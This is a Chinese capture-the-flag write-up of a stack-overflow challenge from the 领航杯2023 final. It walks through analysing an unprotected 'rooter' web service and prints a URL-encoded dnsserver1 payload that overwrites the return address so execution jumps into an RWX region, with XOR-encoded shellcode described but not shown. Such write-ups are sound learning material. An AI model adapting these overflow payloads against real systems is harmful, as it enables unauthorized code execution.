-
-
领航杯2023决赛PWN题解
-
发表于: 2023-9-5 21:42
-
众所周知,领航杯是萌新友好、难度极低的CTF竞赛。领航杯2023决赛采用AWD赛制,依次包含白盒、黑盒和PWN共3题。本文为第3题题解。
登录容器,检查进程。结果如下。
打包/app,下载备份。结构如下。
其中,login.html和lucke.html为静态网页。如图。
rooter为服务程序。检查保护。结果如下。
不难发现没有保护。
rooter.py为守护脚本。脚本内部包含大量提示。通过脚本提示可知端口为8008,漏洞页面为WanStaticIp.html,请求方法为POST,参数包括ipaddr和dnsserver2等。这些可以在服务程序分析中进一步确认。
按照题目描述,flag位于/flag中,格式为cnhongke{^[0-9a-f]{32}$}。
使用Relyze分析rooter。通过题目环境分析定位关键位置WanStaticIp_rpm。如图。
不难发现使用strcpy_2向dnsserver1或dnsserver2复制时可能覆盖返回地址。如图。
进一步观察global_block。通过查找交叉引用定位关键位置init_dispatcher。如图。
发现其基址为0x0233C000,且具有RWX权限。
一种可能dnsserver1载荷如下。
其中,结尾的%70%C0%33%02代表覆盖返回地址为0x0233C070。
同时,相应ipaddr载荷如下。
上述载荷反汇编如下。
上述载荷中采用了异或,这是因为载荷中不能出现%00('\0')和%26('&')等。
简单使用curl请求,即可得到flag。如图。
题目真的非常简单,仅供娱乐。但是如此简单的竞赛我们取得了倒数的成绩,简直奇耻大辱。附件如下。
python /app/rooter.py
sh -c /app/rooter
/app/rooter
python /app/rooter.py
sh -c /app/rooter
/app/rooter
/app/
├── login.html├── lucke.html├── rooter└── rooter.py0 directories, 4 files
/app/
├── login.html├── lucke.html├── rooter└── rooter.py0 directories, 4 files
[*] '/app/rooter'
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x400000)
RWX: Has RWX segments
[*] '/app/rooter'
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x400000)
RWX: Has RWX segments
dnsserver1=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%70%C0%33%02
dnsserver1=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%70%C0%33%02
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
